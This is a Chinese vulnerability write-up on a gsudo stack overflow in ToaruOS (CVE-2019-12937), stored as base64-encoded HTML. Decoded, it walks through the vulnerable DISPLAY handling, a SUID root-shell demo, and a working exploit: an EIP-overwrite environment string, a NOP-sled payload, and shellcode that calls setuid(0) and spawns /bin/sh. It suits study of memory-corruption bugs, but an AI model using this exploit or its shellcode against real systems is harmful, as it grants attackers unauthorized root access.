CVE-2019-12937 ToaruOS 提权漏洞分析

PHA+VG9hcnVPU+aYr+S4gOWll+S9v+eUqEPor63oqIDnvJblhpnnmoTlvIDmupDorqHnrpfmnLrmk43kvZzns7vnu5/vvIzmmK/kuIDkuKrnlLHkvIrliKnor7rkvIrlpKflraborqHnrpfmnLrnp5HlrabmnKznp5HnlJ/lvIDlj5HnmoTkuJrkvZnniLHlpb3mk43kvZzns7vnu5/jgIJUb0FydU9T5Y+v5ZyoUE9TSVjlkox4ODbmnrbmnoTkuIrov5DooYzjgIJUb0FydU9T55qE5Li76KaB5Yqf6IO95YyF5ous5a+56L+b56iL5ZKM57q/56iL55qE5pSv5oyB44CBRUxG5LqM6L+b5Yi255qE5pSv5oyB44CB6L+Q6KGM5pe25Yqg6L295qih5Z2X44CB566h6YGT77yIUGlwZe+8ieWSjOWQhOenjeexu+Wei+eahOe7iOerr+iuvuWkh++8iFRUWe+8ieeahOaUr+aMgeOAgeiZmuaLn+aWh+S7tuezu+e7n+eahOaUr+aMgeOAgUVYVDLmlofku7bns7vnu5/nmoTmlK/mjIHjgIHkv6Hlj7fph4/mlK/mjIHnrYnjgII8L3A+PHA+VG9hcnVPUyAxLjEwLjnlj4rkuYvliY3niYjmnKzkuK3nmoRnc3Vkb+eahGFwcHMvZ3N1ZG8uY+aWh+S7tuWtmOWcqOe8k+WGsuWMuua6ouWHuua8j+a0nuOAguaUu+WHu+iAheWPr+WAn+WKqURJU1BMQVnnjq/looPlj5jph4/liKnnlKjor6XmvI/mtJ7lsIbmnYPpmZDmj5DljYfoh7Nyb29044CCPC9wPjxoMiBpZD0idG9jLTAiPjB4MSDmvI/mtJ7op6blj5HkvY3nva48L2gyPjxwPuWcqHBleF9jb25uZWN05Ye95pWw5L2/55Soc3ByaW50ZuaLvOaOpeWtl+espuS4su+8jOS9huaYr+ayoeacieWIpOaWreWPguaVsHRhcmdldOeahOmVv+W6pu+8jOW9k3RhcmdldOWkqumVv+aXtumAoOaIkOS6huagiOa6ouWHuuOAgjwvcD48ZGl2IGNsYXNzPSJoaWdobGlnaHQiPjxwcmU+RklMRSZuYnNwOyombmJzcDtwZXhfY29ubmVjdChjaGFyJm5ic3A7KiZuYnNwO3RhcmdldCkmbmJzcDt7CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO2NoYXImbmJzcDt0bXBbMTAwXTsKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7c3ByaW50Zih0bXAsJm5ic3A7Ii9kZXYvcGV4LyVzIiwmbmJzcDt0YXJnZXQpOwombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtGSUxFJm5ic3A7KiZuYnNwO291dCZuYnNwOz0mbmJzcDtmb3Blbih0bXAsJm5ic3A7InIrIik7CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO2lmJm5ic3A7KG91dCkmbmJzcDt7CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO3NldGJ1ZihvdXQsJm5ic3A7TlVMTCk7CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO30KJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7cmV0dXJuJm5ic3A7b3V0O308L3ByZT48L2Rpdj48cD7lhbbkuK3lj4LmlbB0YXJnZXTmmK/njq/looPlj5jph49ESVNQTEFZ55qE5YC844CCPC9wPjxkaXYgY2xhc3M9ImhpZ2hsaWdodCI+PHByZT55dXRhbmlfdCZuYnNwOyombmJzcDt5dXRhbmlfaW5pdCh2b2lkKSZuYnNwO3sKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Y2hhciZuYnNwOyombmJzcDtzZXJ2ZXJfbmFtZSZuYnNwOz0mbmJzcDtnZXRlbnYoIkRJU1BMQVkiKTsKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7aWYmbmJzcDsoIXNlcnZlcl9uYW1lKSZuYnNwO3sKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7c2VydmVyX25hbWUmbmJzcDs9Jm5ic3A7ImNvbXBvc2l0b3IiOwombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDt9CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO0ZJTEUmbmJzcDsqJm5ic3A7YyZuYnNwOz0mbmJzcDtwZXhfY29ubmVjdChzZXJ2ZXJfbmFtZSk7CgombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtpZiZuYnNwOyghYykmbmJzcDt7CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO3JldHVybiZuYnNwO05VTEw7Jm5ic3A7LyombmJzcDtDb25uZWN0aW9uJm5ic3A7ZmFpbGVkLiZuYnNwOyovCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO30KJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Li4uLi4uCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOy4uLi4uLn08L3ByZT48L2Rpdj48cD7lnKhnc3Vkb+eoi+W6j+iwg+eUqOS6hnl1dGFuaV9pbml0IOWHveaVsOOAgmdzdWRv5piv5LiA5Liq5oul5pyJU1VJROadg+mZkOeahOeoi+W6j++8jOaJgOS7pWdzdWRv5omn6KGM5pe255qE5p2D6ZmQ5pivcm9vdO+8jOWPr+S7peWIqeeUqOS4iumdoueahOa6ouWHuuadpeaPkOadg+OAgjwvcD48ZGl2IGNsYXNzPSJoaWdobGlnaHQiPjxwcmU+aW50Jm5ic3A7bWFpbihpbnQmbmJzcDthcmdjLCZuYnNwO2NoYXImbmJzcDsqKiZuYnNwO2FyZ3YpJm5ic3A7ewoKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7aWYmbmJzcDsoYXJnYyZuYnNwOzwmbmJzcDsyKSZuYnNwO3sKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7cmV0dXJuJm5ic3A7MTsKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7fQoKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7eWN0eCZuYnNwOz0mbmJzcDt5dXRhbmlfaW5pdCgpOwombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsuLi4uCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOy4uLi59PC9wcmU+PC9kaXY+PGgyIGlkPSJ0b2MtMSI+MHgyIFNVSUQ8L2gyPjxwPlNVSUTnqIvluo/kvJrliJvlu7pz5LiOdOadg+mZkO+8jOaYr+S4uuS6huiuqeS4gOiIrOeUqOaIt+WcqOaJp+ihjOafkOS6m+eoi+W6j+eahOaXtuWAme+8jOiDveWkn+aaguaXtuWFt+acieivpeeoi+W6j+aLpeacieiAheeahOadg+mZkOOAgjwvcD48cD7kuIvpnaLmtYvor5XkuIDkuItTVUlE56iL5bqP5omn6KGM55qE6L+H56iL44CCPC9wPjxkaXYgY2xhc3M9ImhpZ2hsaWdodCI+PHByZT4jaW5jbHVkZSZuYnNwOzxzdGRpby5oPnZvaWQmbmJzcDttYWluKCl7CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO2ludCZuYnNwO3JlczsKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7cmVzJm5ic3A7PSZuYnNwO3NldHVpZCgwKTsKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7cHJpbnRmKCIlZFxuIiwmbmJzcDtyZXMpOwombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtzeXN0ZW0oIi9iaW4vc2giKTt9PC9wcmU+PC9kaXY+PHA+c2V0dWlk5Ye95pWw55So5p2l6K6+572u5b2T5YmN55So5oi355qE6Lqr5Lu977yM5b2T5Y+C5pWw5Li6MO+8jOiuvue9ruW9k+WJjei/m+eoi+S4unJvb3TjgILlnKjosIPnlKhzZXR1aWTkuYvlkI7vvIzmiafooYxzaGVsbOeoi+W6j++8jOinguWvn+W9k+WJjeeUqOaIt+OAgjwvcD48cHJlIGNsYXNzPSJicnVzaDpjcHA7dG9vbGJhcjpmYWxzZSI+dGVzdEB1YnVudHU6fi90ZXN0JCZuYnNwO2djYyZuYnNwOy1vJm5ic3A7c2V0aWQmbmJzcDtzZXRpZC5jJm5ic3A7Jm5ic3A7LXcmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsvL+aZrumAmuadg+mZkAp0ZXN0QHVidW50dTp+L3Rlc3QkJm5ic3A7Li9zZXRpZAotMQokJm5ic3A7aWQKdWlkPTEwMDAodGVzdCkmbmJzcDtnaWQ9MTAwMCh0ZXN0KSZuYnNwO2dyb3Vwcz0xMDAwKHRlc3QpLDQoYWRtKSwyNChjZHJvbSksMjcoc3VkbyksMzAoZGlwKSw0NihwbHVnZGV2KSwxMTYobHBhZG1pbiksMTI2KHNhbWJhc2hhcmUpCiQmbmJzcDtleGl0CnRlc3RAdWJ1bnR1On4vdGVzdCQmbmJzcDtzdWRvJm5ic3A7Y2hvd24mbmJzcDtyb290Jm5ic3A7Jm5ic3A7c2V0aWQmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsvL+iuvue9rlNVSUTmnYPpmZAKdGVzdEB1YnVudHU6fi90ZXN0JCZuYnNwO3N1ZG8mbmJzcDtjaG1vZCZuYnNwO3UrcyZuYnNwOy4vc2V0aWQKdGVzdEB1YnVudHU6fi90ZXN0JCZuYnNwOy4vc2V0aWQKMAojJm5ic3A7aWQKdWlkPTAocm9vdCkmbmJzcDtnaWQ9MTAwMCh0ZXN0KSZuYnNwO2dyb3Vwcz0xMDAwKHRlc3QpLDQoYWRtKSwyNChjZHJvbSksMjcoc3VkbyksMzAoZGlwKSw0NihwbHVnZGV2KSwxMTYobHBhZG1pbiksMTI2KHNhbWJhc2hhcmUpCiMmbmJzcDtleGl0CnRlc3RAdWJ1bnR1On4vdGVzdCQmbmJzcDtscyZuYnNwOy1hbGwmbmJzcDsuL3NldGlkCi1yd3Nyd3hyLXgmbmJzcDsxJm5ic3A7cm9vdCZuYnNwO3Rlc3QmbmJzcDs4MzkyJm5ic3A7SnVsJm5ic3A7Jm5ic3A7NyZuYnNwOzE5OjU3Jm5ic3A7Li9zZXRpZDwvcHJlPjxwPjxici8+PC9wPjxwPuWcqFRvYXJ1T1PkuK3vvIzmk43kvZzns7vnu5/lkK/liqjlrozmiJDlkI7vvIzmiYDmnInnqIvluo/pg73pgJrov4fmiafooYxmb3Jr5YiwZXhlY19lbGbliqDovb3vvIznqIvluo/nmoTmnYPpmZDmmK/niLbov5vnqIvnmoTmnYPpmZDjgILlvZPpgYfliLDnqIvluo/lhbfmnIlzZXR1aWTmnYPpmZDvvIzorr7nva7ov5vnqIvmnYPpmZDkuLrlvZPliY3mlofku7bmi6XmnInogIXmnYPpmZDjgILkuIvlm77kuLpUb2FydU9T5rqQ56CB5Lit6K6+572uU1VJROeoi+W6j+adg+mZkOeahOaTjeS9nOOAgjwvcD48cD48aW1nIHNyYz0iaHR0cHM6Ly9iYnMuemthcS5jbi91cGxvYWQvdXNlcmZpbGUvMTkzMi8wMWUzNGIwMzQxNjMyNWViMTU1YmMwNjk2ZTA4OGUyNS5wbmciLz48L3A+PGgyIGlkPSJ0b2MtMiI+MHgzIOa8j+a0nuWIqeeUqDwvaDI+PHA+5q2k5qyh5rqi5Ye655qE56iL5bqP5Y+R55Sf5Zyo5LiA5Liq5oul5pyJU1VJROadg+mZkOeahOeoi+W6j++8jOaJgOS7peWIqeeUqOagiOa6ouWHuuWPr+S7pei/m+ihjOaPkOadg+aTjeS9nOOAgjwvcD48cD5Ub2FydU9T5Lit5rKh5pyJ5qCI6ZqP5py644CB5aCG6ZqP5py644CB5qCI5LiN5Y+v5omn6KGM562J562J77yM6L+Z5Lqb5L+d5oqk5py65Yi277yM5Yip55So6LW35p2l55u45b2T566A5Y2V77yM5L2G5piv5Lmf5rKh5pyJZ2Ri5LiA5Lqb6LCD6K+V5bel5YW377yM6L+Y5piv6KaB6LS554K55b+D5oCd44CCPC9wPjxwPumAmui/h+agiOa6ouWHuua8j+a0nuaOp+WItmVpcOWIsOaIkeS7rOeahOaPkOadg3BheWxvYWTlnLDlnYDjgILmoIjkuIrlj6/ku6XmiafooYzku6PnoIHvvIzmoIjlnLDlnYDkuZ/mmK/lm7rlrprnmoTvvIzmiJHku6zpgJrov4dhcmd25Y+Y6YeP5oqKcGF5bG9hZOaUvuWIsOagiOS4iuOAgmFyZ3bnmoTlnLDlnYDnm7TmjqVwcmludGYoIiV4XG4iLCBhcmd2KSDmiZPljbDlh7rmnaXjgII8L3A+PHA+PGJyLz48L3A+PHA+PGltZyBzcmM9Imh0dHBzOi8vYmJzLnprYXEuY24vdXBsb2FkL3VzZXJmaWxlLzE5MzIvOTZkMTI0NzEzYmQyZGY2ZmNiNmQwOWExNzM1YzEyNjgucG5nIi8+PC9wPjxwPuiuvue9rueOr+Wig+WPmOmHj+eahOWAvO+8jOaOp+WItmVpcOWAvOWIsGFyZ3blnLDlnYDvvIxhcmd25Zyw5Z2A5LiN6IO95Ye6546wXHgwMOWtl+espu+8jOmAmui/h+Whq+WFhU5vcOaMh+S7pOe7lei/h+OAgjxici8+PGJyLz4jZGVmaW5lIEVJUCZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAiXHgwY1x4YzBceDAxXHgzZiI8YnIvPmNoYXIgdmVjdG9yWzgxOTJdJm5ic3A7Jm5ic3A7ID0gIkRJU1BMQVk9QUFBIjs8YnIvPmNoYXIgKiBjb25zdCBlbnZbM10gPSB7ICJhYSIsIHZlY3RvciwgTlVMTCB9Ozxici8+Zm9yICh1bnNpZ25lZCBpbnQgaSA9IDA7IGkgPCAyNjsgaSsrKTxici8+Jm5ic3A7Jm5ic3A7Jm5ic3A7IHN0cmNhdCh2ZWN0b3IsIEVJUCk7PGJyLz48YnIvPnBheWxvYWTpgJrov4dhcmfkvKDpgJI8YnIvPjxici8+Y2hhciBwYXlsb2FkWzg1NTM2XTs8YnIvPmNoYXIgKiBjb25zdCBhcmdbM10gPSB7IHBheWxvYWQsICJscyIsIE5VTEwgfTs8YnIvPjxici8+bWVtc2V0KHBheWxvYWQsICYjMzk7XHg5MCYjMzk7LCBzaXplb2YocGF5bG9hZCkgLSBzaGVsbGNvZGVfbGVuZ3RoIC0gMSk7PGJyLz5wYXlsb2FkW3NpemVvZihwYXlsb2FkKSAtIHNoZWxsY29kZV9sZW5ndGggLSAxXSA9IDA7PGJyLz5zdHJjYXQocGF5bG9hZCwgc2hlbGxjb2RlKTs8YnIvPjxici8+5omn6KGMZ3N1ZG88YnIvPjxici8+ZXhlY3ZlKCIvYmluL2dzdWRvIiwgYXJnLCBlbnYpOzxici8+PGJyLz5wYXlsb2FkPGJyLz48YnIvPuWcqHBheWxvYWQg6aaW5YWI5omn6KGMc2V0dWlkKDAp6K6+572u5b2T5YmN6L+b56iL5p2D6ZmQ77yM54S25ZCO5omn6KGMc3lzdGVtKC9iaW4vc2hoKei/lOWbnnNoZWxs44CCdG9hcnVPU+mAmui/h2ludCAweDdm6LCD55So57O757uf5Ye95pWw77yM5Zyoc3lzY2FsbF9udW1zLmjkuK3mnInns7vnu5/osIPnlKjlj7fvvIxzZXR1aWTlr7nlupQyNO+8jHN5c3RlbeWvueW6lDfjgII8L3A+PHByZSBjbGFzcz0iYnJ1c2g6Y3BwO3Rvb2xiYXI6ZmFsc2UiPnhvciZuYnNwO2VheCwmbmJzcDtlYXgKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7YWRkJm5ic3A7YWwsJm5ic3A7MjQKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7eG9yJm5ic3A7ZWJ4LCZuYnNwO2VieAombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtpbnQmbmJzcDsweDdmCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO2ptcCZuYnNwO3Nob3J0Jm5ic3A7ZW5kCnN0YXJ0OgombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtwb3AmbmJzcDtlYngKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7eG9yJm5ic3A7ZWF4LCZuYnNwO2VheAombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDttb3YmbmJzcDtbZWJ4KzddLCZuYnNwO2FsCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO21vdiZuYnNwO1tlYngrOF0sJm5ic3A7ZWJ4CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO21vdiZuYnNwO1tlYngrMTJdLCZuYnNwO2VheAombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDthZGQmbmJzcDthbCwmbmJzcDs3CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO2xlYSZuYnNwO2VjeCwmbmJzcDtbZWJ4KzhdCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO2xlYSZuYnNwO2VkeCwmbmJzcDtbZWJ4KzEyXQombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtpbnQmbmJzcDsweDdmCiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO3hvciZuYnNwO2VheCwmbmJzcDtlYXgKJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7aW50Jm5ic3A7MHg3ZgplbmQ6CiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO2NhbGwmbmJzcDtzdGFydApkYiZuYnNwOyIvYmluL3NoaCIKZGImbmJzcDsiWFhYWFhYWFgiPC9wcmU+PHA+PGJyLz48L3A+PHA+PGltZyBzcmM9Imh0dHBzOi8vYmJzLnprYXEuY24vdXBsb2FkL3VzZXJmaWxlLzE5MzIvNDkyYmMyOWMwYjEyNGM2MGVlMmIyZjQ1OWI1ZjU4ODEucG5nIi8+PC9wPjxwPjxici8+PC9wPjxwPui9rOiHquWFiOefpeekvuWMujxici8+PC9wPg==